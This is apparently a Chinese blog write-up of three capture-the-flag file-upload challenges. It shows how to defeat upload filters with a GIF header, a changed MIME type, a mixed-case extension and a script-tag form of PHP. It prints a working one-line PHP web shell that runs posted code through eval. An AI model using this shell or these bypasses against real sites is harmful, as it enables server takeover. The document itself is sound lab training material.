getshell
![](https://i-blog.csdnimg.cn/blog_migrate/9fb25f324a6a15fe2b3965693ab7ceca.png)
看到这个猜到是文件包含型文件上传题了,后续操作确实也是这样,上传一个图片马,包含一下getshell,不过<?
和?>
被过滤了
![](https://i-blog.csdnimg.cn/blog_migrate/efb280cb6457f26d44ff1c10c33aaf58.png)
改成
<script language="php"></script>
绕过一下就好了
upload-01
![](https://i-blog.csdnimg.cn/blog_migrate/7fd2c75b40bc69ebf1bfde7d95bc2c4b.png)
说要传一个php木马,传一个php上去提示说只能传gif
![](https://i-blog.csdnimg.cn/blog_migrate/14bbc0e1d4d04548ea437195043b2a70.png)
加一个GIF文件头,抓包改一下MIME类型上传成功,得到flag
GIF89a<?php @eval($_POST['a']);?>
![](https://i-blog.csdnimg.cn/blog_migrate/e3f1a9bf741bce0611be4e226b395504.png)
upload-02
上传php提示文件过大或者文件类型不对,改一下MIME提示文件类型出错
后缀改成PhP大小写绕过,得到flag
![](https://i-blog.csdnimg.cn/blog_migrate/d3fd1a6e4fb6c6d55f258e0120c37104.png)